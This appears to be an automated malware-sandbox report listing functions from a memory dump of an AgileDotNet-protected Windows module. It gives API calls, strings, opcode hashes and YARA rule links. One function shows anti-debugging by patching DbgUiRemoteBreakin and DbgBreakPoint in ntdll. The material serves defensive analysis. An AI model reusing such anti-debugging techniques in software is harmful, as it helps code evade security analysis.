Function 00007FFD7ACC4E86, Relevance: 1.5, APIs: 1, Instructions: 12memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 00007FFD7ACC4EA3

Memory Dump Source

Source File: 00000000.00000002.356811508.00007FFD7ACC1000.00000020.00020000.sdmp, Offset: 00007FFD7ACC0000, based on PE: true

Associated: 00000000.00000002.356734964.00007FFD7ACC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.356964212.00007FFD7ACD0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357013594.00007FFD7ACD2000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357041645.00007FFD7ACD3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357097464.00007FFD7ACD5000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.357133933.00007FFD7ACD6000.00000080.00020000.sdmp Download File

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 72189b58642236b9b2daf3da617808f0d888f1c4729a4582526202d3a6ff2380
Instruction ID: 7a8d216e9b9be6e3ca77bf68d8c6e328418e6132f9e6023f3fb84f7747278134
Opcode Fuzzy Hash: 72189b58642236b9b2daf3da617808f0d888f1c4729a4582526202d3a6ff2380
Instruction Fuzzy Hash: D2D0172762D945E1D2248B4AA85056DA310E7847A4F600666FAAF1A6F8CE7CD0048B04

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FFD7ACC27C0, Relevance: 84.3, APIs: 44, Strings: 4, Instructions: 259encryptionmemoryCOMMON

Download Yara Rule

APIs

CryptQueryObject.CRYPT32 ref: 00007FFD7ACC2882
LocalFree.KERNEL32 ref: 00007FFD7ACC28AA
LocalFree.KERNEL32 ref: 00007FFD7ACC28C3
LocalFree.KERNEL32 ref: 00007FFD7ACC28DC
LocalFree.KERNEL32 ref: 00007FFD7ACC28F5
LocalFree.KERNEL32 ref: 00007FFD7ACC290E
CertFreeCertificateContext.CRYPT32 ref: 00007FFD7ACC2921
CertCloseStore.CRYPT32 ref: 00007FFD7ACC293C
CryptMsgClose.CRYPT32 ref: 00007FFD7ACC2955
CryptMsgGetParam.CRYPT32 ref: 00007FFD7ACC2982
LocalFree.KERNEL32 ref: 00007FFD7ACC29AA
LocalFree.KERNEL32 ref: 00007FFD7ACC29C3
LocalFree.KERNEL32 ref: 00007FFD7ACC29DC
LocalFree.KERNEL32 ref: 00007FFD7ACC29F5
LocalFree.KERNEL32 ref: 00007FFD7ACC2A0E
CertFreeCertificateContext.CRYPT32 ref: 00007FFD7ACC2A21
CertCloseStore.CRYPT32 ref: 00007FFD7ACC2A3C
CryptMsgClose.CRYPT32 ref: 00007FFD7ACC2A55
LocalAlloc.KERNEL32 ref: 00007FFD7ACC2A70
LocalFree.KERNEL32 ref: 00007FFD7ACC2A9A
LocalFree.KERNEL32 ref: 00007FFD7ACC2AB3
LocalFree.KERNEL32 ref: 00007FFD7ACC2ACC
LocalFree.KERNEL32 ref: 00007FFD7ACC2AE5
LocalFree.KERNEL32 ref: 00007FFD7ACC2AFE
CertFreeCertificateContext.CRYPT32 ref: 00007FFD7ACC2B11
CertCloseStore.CRYPT32 ref: 00007FFD7ACC2B2C
CryptMsgClose.CRYPT32 ref: 00007FFD7ACC2B45
CryptMsgGetParam.CRYPT32 ref: 00007FFD7ACC2B77
LocalFree.KERNEL32 ref: 00007FFD7ACC2B9F
LocalFree.KERNEL32 ref: 00007FFD7ACC2BB8
LocalFree.KERNEL32 ref: 00007FFD7ACC2BD1
LocalFree.KERNEL32 ref: 00007FFD7ACC2BEA
LocalFree.KERNEL32 ref: 00007FFD7ACC2C03
CertFreeCertificateContext.CRYPT32 ref: 00007FFD7ACC2C16
CertCloseStore.CRYPT32 ref: 00007FFD7ACC2C31
CryptMsgClose.CRYPT32 ref: 00007FFD7ACC2C4A
LocalFree.KERNEL32 ref: 00007FFD7ACC2CDE
LocalFree.KERNEL32 ref: 00007FFD7ACC2CF7
LocalFree.KERNEL32 ref: 00007FFD7ACC2D10
LocalFree.KERNEL32 ref: 00007FFD7ACC2D29
LocalFree.KERNEL32 ref: 00007FFD7ACC2D42
CertFreeCertificateContext.CRYPT32 ref: 00007FFD7ACC2D55
CertCloseStore.CRYPT32 ref: 00007FFD7ACC2D70
CryptMsgClose.CRYPT32 ref: 00007FFD7ACC2D89

Strings

h, xrefs: 00007FFD7ACC2C8E
~, xrefs: 00007FFD7ACC2C66
E, xrefs: 00007FFD7ACC2C7A
Z, xrefs: 00007FFD7ACC2C57

Memory Dump Source

Source File: 00000000.00000002.356811508.00007FFD7ACC1000.00000020.00020000.sdmp, Offset: 00007FFD7ACC0000, based on PE: true

Associated: 00000000.00000002.356734964.00007FFD7ACC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.356964212.00007FFD7ACD0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357013594.00007FFD7ACD2000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357041645.00007FFD7ACD3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357097464.00007FFD7ACD5000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.357133933.00007FFD7ACD6000.00000080.00020000.sdmp Download File

Similarity

API ID: Free$Local$CertClose$Crypt$CertificateContextStore$Param$AllocObjectQuery
String ID: E$Z$h$~
API String ID: 4286058620-1241516678
Opcode ID: f37d4dacff2ad3c0a540b8ab247b6c7f538f3a79a3ee029477fddc81231c9165
Instruction ID: 463e0a1b45fc9a1a3b4fc3a35092f230a73cbbccf35b0ab5aff4d50bbbbf9704
Opcode Fuzzy Hash: f37d4dacff2ad3c0a540b8ab247b6c7f538f3a79a3ee029477fddc81231c9165
Instruction Fuzzy Hash: 69F1EE2661CAC1A1F7749B19E4683AE77A1FBC0744F404176D68F8A9B8CF7CE489CB01

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD7ACC14D0, Relevance: 36.3, APIs: 24, Instructions: 287memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FFD7ACC1544
HeapAlloc.KERNEL32 ref: 00007FFD7ACC155A
ReadProcessMemory.KERNEL32 ref: 00007FFD7ACC159D
GetProcessHeap.KERNEL32 ref: 00007FFD7ACC15B5
HeapFree.KERNEL32 ref: 00007FFD7ACC15C5
GetProcessHeap.KERNEL32 ref: 00007FFD7ACC160E
HeapFree.KERNEL32 ref: 00007FFD7ACC161E

Memory Dump Source

Source File: 00000000.00000002.356811508.00007FFD7ACC1000.00000020.00020000.sdmp, Offset: 00007FFD7ACC0000, based on PE: true

Associated: 00000000.00000002.356734964.00007FFD7ACC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.356964212.00007FFD7ACD0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357013594.00007FFD7ACD2000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357041645.00007FFD7ACD3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357097464.00007FFD7ACD5000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.357133933.00007FFD7ACD6000.00000080.00020000.sdmp Download File

Similarity

API ID: Heap$Process$Free$AllocMemoryRead
String ID:
API String ID: 3401992658-0
Opcode ID: c092bd91e02114ca350af130b999d58345a00cd97ed68f4120483b5cf858862f
Instruction ID: a0ce6d37df89f3fb2882affa6650a34320d44b4b6c0ee1d8c7863f6f1a2e420d
Opcode Fuzzy Hash: c092bd91e02114ca350af130b999d58345a00cd97ed68f4120483b5cf858862f
Instruction Fuzzy Hash: BEE1EC3671CB8196E764CB5AE45436EB7A0FBC9B94F114075DA8E87B68DF3CE4448B00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD7ACC3270, Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FFD7ACC3323
HeapAlloc.KERNEL32 ref: 00007FFD7ACC3339
RaiseException.KERNEL32 ref: 00007FFD7ACC33A1

Part of subcall function 00007FFD7ACCDFB0: ExitProcess.KERNEL32 ref: 00007FFD7ACCDFC1

GetProcessHeap.KERNEL32 ref: 00007FFD7ACC33DB
HeapFree.KERNEL32 ref: 00007FFD7ACC33EB
GetProcessHeap.KERNEL32 ref: 00007FFD7ACC3400
HeapAlloc.KERNEL32 ref: 00007FFD7ACC3416
RaiseException.KERNEL32 ref: 00007FFD7ACC347E
type_info::_name_internal_method.LIBCMTD ref: 00007FFD7ACC34EE
GetProcessHeap.KERNEL32 ref: 00007FFD7ACC3607
HeapFree.KERNEL32 ref: 00007FFD7ACC3617

Strings

Memory allocation failed for IP_ADAPTER_ADDRESSES struct, xrefs: 00007FFD7ACC3431
Memory allocation failed for IP_ADAPTER_ADDRESSES struct, xrefs: 00007FFD7ACC3354
luetooth, xrefs: 00007FFD7ACC34DE

Memory Dump Source

Source File: 00000000.00000002.356811508.00007FFD7ACC1000.00000020.00020000.sdmp, Offset: 00007FFD7ACC0000, based on PE: true

Associated: 00000000.00000002.356734964.00007FFD7ACC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.356964212.00007FFD7ACD0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357013594.00007FFD7ACD2000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357041645.00007FFD7ACD3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357097464.00007FFD7ACD5000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.357133933.00007FFD7ACD6000.00000080.00020000.sdmp Download File

Similarity

API ID: Heap$Process$AllocExceptionFreeRaise$Exittype_info::_name_internal_method
String ID: Memory allocation failed for IP_ADAPTER_ADDRESSES struct$Memory allocation failed for IP_ADAPTER_ADDRESSES struct$luetooth
API String ID: 563264890-3343762360
Opcode ID: 330f24502bddec7f1076650365d7e7083caaba026793227b71ceaa35dd227c38
Instruction ID: 02419cc5c582908025dda44bab3ebb21de7462b1e07c9d9067caf1c5f5d64485
Opcode Fuzzy Hash: 330f24502bddec7f1076650365d7e7083caaba026793227b71ceaa35dd227c38
Instruction Fuzzy Hash: 47913B36A18B8196E768DB56F4643AEB7A0FBC8794F404035DA8E47B68DF7CD144CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD7ACC6020, Relevance: 21.1, APIs: 4, Strings: 8, Instructions: 104windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32 ref: 00007FFD7ACC612F

Strings

AgileDotNet, xrefs: 00007FFD7ACC611E
The secured image was created using a trial version of , xrefs: 00007FFD7ACC61CB
AgileDotNet, xrefs: 00007FFD7ACC60F0
and can not run on this machine., xrefs: 00007FFD7ACC61F3
AgileDotNet, xrefs: 00007FFD7ACC61DF
AgileDotNet, xrefs: 00007FFD7ACC620D
and can not run on this machine., xrefs: 00007FFD7ACC6104
The secured image was created using a trial version of , xrefs: 00007FFD7ACC60DC

Memory Dump Source

Source File: 00000000.00000002.356811508.00007FFD7ACC1000.00000020.00020000.sdmp, Offset: 00007FFD7ACC0000, based on PE: true

Associated: 00000000.00000002.356734964.00007FFD7ACC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.356964212.00007FFD7ACD0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357013594.00007FFD7ACD2000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357041645.00007FFD7ACD3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357097464.00007FFD7ACD5000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.357133933.00007FFD7ACD6000.00000080.00020000.sdmp Download File

Similarity

API ID: Message
String ID: and can not run on this machine.$ and can not run on this machine.$AgileDotNet$AgileDotNet$AgileDotNet$AgileDotNet$The secured image was created using a trial version of $The secured image was created using a trial version of
API String ID: 2030045667-3305494433
Opcode ID: 18e05ae196a12278f5a0e9663da43ea4b63f82d9905ab77b9d5541b3586509d9
Instruction ID: 5b6f7807414e87956bf53e28f3cccf9c002c26fd198d570339dffe32727014da
Opcode Fuzzy Hash: 18e05ae196a12278f5a0e9663da43ea4b63f82d9905ab77b9d5541b3586509d9
Instruction Fuzzy Hash: 4451702B72C5C2A0FB799725E4603FEA761EBC5384F811076D58D8B5BAEE2CD245CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD7ACC2E00, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 105encryptionmemorystringCOMMON

Download Yara Rule

APIs

lstrcmpA.KERNEL32 ref: 00007FFD7ACC2E70
CryptDecodeObject.CRYPT32 ref: 00007FFD7ACC2EDC
CertFreeCertificateContext.CRYPT32 ref: 00007FFD7ACC2EFA
LocalAlloc.KERNEL32 ref: 00007FFD7ACC2F14
CertFreeCertificateContext.CRYPT32 ref: 00007FFD7ACC2F3A
CryptDecodeObject.CRYPT32 ref: 00007FFD7ACC2FAB
CertFreeCertificateContext.CRYPT32 ref: 00007FFD7ACC2FC9
CertFreeCertificateContext.CRYPT32 ref: 00007FFD7ACC2FF1

Strings

1.2.840.113549.1.9.6, xrefs: 00007FFD7ACC2E65

Memory Dump Source

Source File: 00000000.00000002.356811508.00007FFD7ACC1000.00000020.00020000.sdmp, Offset: 00007FFD7ACC0000, based on PE: true

Associated: 00000000.00000002.356734964.00007FFD7ACC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.356964212.00007FFD7ACD0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357013594.00007FFD7ACD2000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357041645.00007FFD7ACD3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357097464.00007FFD7ACD5000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.357133933.00007FFD7ACD6000.00000080.00020000.sdmp Download File

Similarity

API ID: CertCertificateContextFree$CryptDecodeObject$AllocLocallstrcmp
String ID: 1.2.840.113549.1.9.6
API String ID: 335881361-2921522063
Opcode ID: 8e4936715672ca35a4dbb6e89150a9afdd23db377a94929509f59349fd0b8221
Instruction ID: 3272ca1d79095769ff6a2dd769f7d68bb4e6e21d6d764b19a1631a361bc4a272
Opcode Fuzzy Hash: 8e4936715672ca35a4dbb6e89150a9afdd23db377a94929509f59349fd0b8221
Instruction Fuzzy Hash: 6E51DA76618A45D6EB18DB19E4A432EB7A0F7C4B84F104166EB8E4BB78CF7DD485CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD7ACC2E35, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46encryptionmemorystringCOMMON

Download Yara Rule

APIs

lstrcmpA.KERNEL32 ref: 00007FFD7ACC2E70
CryptDecodeObject.CRYPT32 ref: 00007FFD7ACC2EDC
CertFreeCertificateContext.CRYPT32 ref: 00007FFD7ACC2EFA
LocalAlloc.KERNEL32 ref: 00007FFD7ACC2F14
CertFreeCertificateContext.CRYPT32 ref: 00007FFD7ACC2F3A
CertFreeCertificateContext.CRYPT32 ref: 00007FFD7ACC2FF1

Strings

1.2.840.113549.1.9.6, xrefs: 00007FFD7ACC2E65

Memory Dump Source

Source File: 00000000.00000002.356811508.00007FFD7ACC1000.00000020.00020000.sdmp, Offset: 00007FFD7ACC0000, based on PE: true

Associated: 00000000.00000002.356734964.00007FFD7ACC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.356964212.00007FFD7ACD0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357013594.00007FFD7ACD2000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357041645.00007FFD7ACD3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357097464.00007FFD7ACD5000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.357133933.00007FFD7ACD6000.00000080.00020000.sdmp Download File

Similarity

API ID: CertCertificateContextFree$AllocCryptDecodeLocalObjectlstrcmp
String ID: 1.2.840.113549.1.9.6
API String ID: 2299954700-2921522063
Opcode ID: aa9af5a0a7909e57e5d629f5d53f7d8e6b5abfa9249caeb56624ab754a0d0189
Instruction ID: 3b30255f294ae07e9ea6406ecd64d2456967985c1df08f0e1f82d637026b0b3e
Opcode Fuzzy Hash: aa9af5a0a7909e57e5d629f5d53f7d8e6b5abfa9249caeb56624ab754a0d0189
Instruction Fuzzy Hash: DF21F876718A8586DB18CB09E49032EB7A0F7C4B84F504126EA8E8BB78DF7CD445CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD7ACC10A0, Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32 ref: 00007FFD7ACC10BC

Memory Dump Source

Source File: 00000000.00000002.356811508.00007FFD7ACC1000.00000020.00020000.sdmp, Offset: 00007FFD7ACC0000, based on PE: true

Associated: 00000000.00000002.356734964.00007FFD7ACC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.356964212.00007FFD7ACD0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357013594.00007FFD7ACD2000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357041645.00007FFD7ACD3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357097464.00007FFD7ACD5000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.357133933.00007FFD7ACD6000.00000080.00020000.sdmp Download File

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: 16c98b60504202c8745f39f82cb4b79dd388ece3ba03d14d9ea444e5f956a03b
Instruction ID: ef67884fd1bc476bc4b17825fd54dd521d55410fe04c7c8767be64d1bb40a6ab
Opcode Fuzzy Hash: 16c98b60504202c8745f39f82cb4b79dd388ece3ba03d14d9ea444e5f956a03b
Instruction Fuzzy Hash: B521F137A3D241DAEBB48A02E55433E76A0F7D5769F11117BE28A0A9A8C73DD488CE01

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD7ACC1190, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 72librarymemoryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FFD7ACC10A0: GetVersionExW.KERNEL32 ref: 00007FFD7ACC10BC

LoadLibraryW.KERNEL32 ref: 00007FFD7ACC11C4
GetProcAddress.KERNEL32 ref: 00007FFD7ACC11F1
GetProcAddress.KERNEL32 ref: 00007FFD7ACC120A
FreeLibrary.KERNEL32 ref: 00007FFD7ACC1222
VirtualProtect.KERNEL32 ref: 00007FFD7ACC1244
FreeLibrary.KERNEL32 ref: 00007FFD7ACC1253
VirtualProtect.KERNEL32 ref: 00007FFD7ACC12A6
FreeLibrary.KERNEL32 ref: 00007FFD7ACC12B5

Strings

DbgBreakPoint, xrefs: 00007FFD7ACC11FE
ntdll.dll, xrefs: 00007FFD7ACC11BD
DbgUiRemoteBreakin, xrefs: 00007FFD7ACC11E5

Memory Dump Source

Source File: 00000000.00000002.356811508.00007FFD7ACC1000.00000020.00020000.sdmp, Offset: 00007FFD7ACC0000, based on PE: true

Associated: 00000000.00000002.356734964.00007FFD7ACC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.356964212.00007FFD7ACD0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357013594.00007FFD7ACD2000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357041645.00007FFD7ACD3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357097464.00007FFD7ACD5000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.357133933.00007FFD7ACD6000.00000080.00020000.sdmp Download File

Similarity

API ID: Library$Free$AddressProcProtectVirtual$LoadVersion
String ID: DbgBreakPoint$DbgUiRemoteBreakin$ntdll.dll
API String ID: 3302647564-76633807
Opcode ID: ab9ef7ed6cd6c395f39c957dc80b26155912d58f1f8d323b93a2bc15916d8161
Instruction ID: afe219398a693c5676e284b71866249162c849ec5de4fc3047b97c747b45a1f8
Opcode Fuzzy Hash: ab9ef7ed6cd6c395f39c957dc80b26155912d58f1f8d323b93a2bc15916d8161
Instruction Fuzzy Hash: 9831302BA2CA81A2E7648B16E46432E77A0FBC5794F5111B2E68F4B778DF3DD544CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD7ACC9780, Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 59memorytimefileCOMMON

Download Yara Rule

APIs

GetTempPathA.KERNEL32 ref: 00007FFD7ACC9791
GetSystemTime.KERNEL32 ref: 00007FFD7ACC979F
GetDateFormatA.KERNEL32 ref: 00007FFD7ACC97CB
GetTimeFormatA.KERNEL32 ref: 00007FFD7ACC97F7

Part of subcall function 00007FFD7ACCE920: lstrcpyA.KERNEL32 ref: 00007FFD7ACCE938

Part of subcall function 00007FFD7ACCEAC0: lstrcatA.KERNEL32 ref: 00007FFD7ACCEAD8

CreateFileA.KERNEL32 ref: 00007FFD7ACC98A4
GetProcessHeap.KERNEL32 ref: 00007FFD7ACC98B1
HeapAlloc.KERNEL32 ref: 00007FFD7ACC98C2
InitializeCriticalSection.KERNEL32 ref: 00007FFD7ACC98D6

Strings

dd'd'MM'm'yyyy'y', xrefs: 00007FFD7ACC97BA
HH'h'mm'm'ss's', xrefs: 00007FFD7ACC97E6
RuntimeLog, xrefs: 00007FFD7ACC9823
.txt, xrefs: 00007FFD7ACC9861

Memory Dump Source

Source File: 00000000.00000002.356811508.00007FFD7ACC1000.00000020.00020000.sdmp, Offset: 00007FFD7ACC0000, based on PE: true

Associated: 00000000.00000002.356734964.00007FFD7ACC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.356964212.00007FFD7ACD0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357013594.00007FFD7ACD2000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357041645.00007FFD7ACD3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357097464.00007FFD7ACD5000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.357133933.00007FFD7ACD6000.00000080.00020000.sdmp Download File

Similarity

API ID: FormatHeapTime$AllocCreateCriticalDateFileInitializePathProcessSectionSystemTemplstrcatlstrcpy
String ID: .txt$HH'h'mm'm'ss's'$RuntimeLog$dd'd'MM'm'yyyy'y'
API String ID: 641398865-1436097571
Opcode ID: cfcd327ad20f2c4ebf0c26f82dc3c0cecb21f7959b97e6ef7548083dedbb9d0d
Instruction ID: e0120abd21cc36ec7cc3fb7b4fcb5c580009dbd99aef65d4a88ce12631a96bb3
Opcode Fuzzy Hash: cfcd327ad20f2c4ebf0c26f82dc3c0cecb21f7959b97e6ef7548083dedbb9d0d
Instruction Fuzzy Hash: 35311E7AB28A82E5F764DB15E8643EE6361FBC9704F804175D68E0AA78DF3CD509CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD7ACCF084, Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 202libraryCOMMON

Download Yara Rule

APIs

RaiseException.KERNEL32 ref: 00007FFD7ACCF117
LoadLibraryA.KERNEL32 ref: 00007FFD7ACCF1BA
GetLastError.KERNEL32 ref: 00007FFD7ACCF1C8
RaiseException.KERNEL32 ref: 00007FFD7ACCF205

Strings

H, xrefs: 00007FFD7ACCF0C2

Memory Dump Source

Source File: 00000000.00000002.356811508.00007FFD7ACC1000.00000020.00020000.sdmp, Offset: 00007FFD7ACC0000, based on PE: true

Associated: 00000000.00000002.356734964.00007FFD7ACC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.356964212.00007FFD7ACD0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357013594.00007FFD7ACD2000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357041645.00007FFD7ACD3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357097464.00007FFD7ACD5000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.357133933.00007FFD7ACD6000.00000080.00020000.sdmp Download File

Similarity

API ID: ExceptionRaise$ErrorLastLibraryLoad
String ID: H
API String ID: 948315288-2852464175
Opcode ID: ee2d45940e96b917264e393e1d3c76a826ecfce7a7bf487f30675d6ebd8721c4
Instruction ID: edcbb738dc5036758fe391d41f99158a022c7a2b281eabfae1f7a393e2841840
Opcode Fuzzy Hash: ee2d45940e96b917264e393e1d3c76a826ecfce7a7bf487f30675d6ebd8721c4
Instruction Fuzzy Hash: BC91513BB15B46AAEB59CFA5D4606AC37A5FB48758F09407ACE0D0BB64EF38E445C340

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD7ACC1FE0, Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 21libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FFD7ACC1FEB
GetProcAddress.KERNEL32 ref: 00007FFD7ACC2012
GetProcAddress.KERNEL32 ref: 00007FFD7ACC202D
GetProcAddress.KERNEL32 ref: 00007FFD7ACC2048

Strings

GetFileVersion, xrefs: 00007FFD7ACC203A
GetRequestedRuntimeInfo, xrefs: 00007FFD7ACC201F
GetCORVersion, xrefs: 00007FFD7ACC2004
mscoree.dll, xrefs: 00007FFD7ACC1FE4

Memory Dump Source

Source File: 00000000.00000002.356811508.00007FFD7ACC1000.00000020.00020000.sdmp, Offset: 00007FFD7ACC0000, based on PE: true

Associated: 00000000.00000002.356734964.00007FFD7ACC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.356964212.00007FFD7ACD0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357013594.00007FFD7ACD2000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357041645.00007FFD7ACD3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357097464.00007FFD7ACD5000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.357133933.00007FFD7ACD6000.00000080.00020000.sdmp Download File

Similarity

API ID: AddressProc$LibraryLoad
String ID: GetCORVersion$GetFileVersion$GetRequestedRuntimeInfo$mscoree.dll
API String ID: 2238633743-1350728216
Opcode ID: d826704790d033716dd216c7ec9c9063b7fa4c577408e980b32030f32d790cb1
Instruction ID: 1dc10dc2d2bfc9bd4cb84b5248d53d05681218910070a6285a880268613d8466
Opcode Fuzzy Hash: d826704790d033716dd216c7ec9c9063b7fa4c577408e980b32030f32d790cb1
Instruction Fuzzy Hash: 9001623EB29B06B6F6089B0AE8A427D33A5BF49760F8141B6D40F4A2349F2CA595C201

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD7ACC3BF0, Relevance: 13.6, APIs: 9, Instructions: 84memoryCOMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION ref: 00007FFD7ACC3C13
GetProcessHeap.KERNEL32 ref: 00007FFD7ACC3C36
HeapAlloc.KERNEL32 ref: 00007FFD7ACC3C4C
GetFileVersionInfoW.VERSION ref: 00007FFD7ACC3C6B
VerQueryValueA.VERSION ref: 00007FFD7ACC3C8E
GetProcessHeap.KERNEL32 ref: 00007FFD7ACC3D38
HeapFree.KERNEL32 ref: 00007FFD7ACC3D48

Memory Dump Source

Source File: 00000000.00000002.356811508.00007FFD7ACC1000.00000020.00020000.sdmp, Offset: 00007FFD7ACC0000, based on PE: true

Associated: 00000000.00000002.356734964.00007FFD7ACC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.356964212.00007FFD7ACD0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357013594.00007FFD7ACD2000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357041645.00007FFD7ACD3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357097464.00007FFD7ACD5000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.357133933.00007FFD7ACD6000.00000080.00020000.sdmp Download File

Similarity

API ID: Heap$FileInfoProcessVersion$AllocFreeQuerySizeValue
String ID:
API String ID: 182793968-0
Opcode ID: 05e3513315fbe38f6ff0c8c1c03f7aaae7497d33d968b3ab91dc32162ee242f0
Instruction ID: 2c4c55b5dbfe5c91d84afc9426d3e5a1a376a8ce4126f8b59ec5690016f3e8f1
Opcode Fuzzy Hash: 05e3513315fbe38f6ff0c8c1c03f7aaae7497d33d968b3ab91dc32162ee242f0
Instruction Fuzzy Hash: 4341E87AA18B8196E764DF2AE45036EB7A1FBC8740F508136EA8D87768DE3CD005CF00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD7ACCC560, Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 224COMMON

Download Yara Rule

APIs

RaiseException.KERNEL32 ref: 00007FFD7ACCC72B

Part of subcall function 00007FFD7ACCE770: lstrcmpA.KERNEL32 ref: 00007FFD7ACCE788

Strings

Table stream was not found., xrefs: 00007FFD7ACCC6DE
, xrefs: 00007FFD7ACCC799
@, xrefs: 00007FFD7ACCC895
-, xrefs: 00007FFD7ACCC76C
@, xrefs: 00007FFD7ACCC816

Memory Dump Source

Source File: 00000000.00000002.356811508.00007FFD7ACC1000.00000020.00020000.sdmp, Offset: 00007FFD7ACC0000, based on PE: true

Associated: 00000000.00000002.356734964.00007FFD7ACC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.356964212.00007FFD7ACD0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357013594.00007FFD7ACD2000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357041645.00007FFD7ACD3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357097464.00007FFD7ACD5000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.357133933.00007FFD7ACD6000.00000080.00020000.sdmp Download File

Similarity

API ID: ExceptionRaiselstrcmp
String ID: $-$@$@$Table stream was not found.
API String ID: 789130480-3695719007
Opcode ID: 6947872f01eb5e6eedf7bcccf6aeede4d7ca020c34320d71c4175c94c52ef6f5
Instruction ID: 63a2626caed1b197546a4897a8c72028ff303972d5a8547322657638446bd769
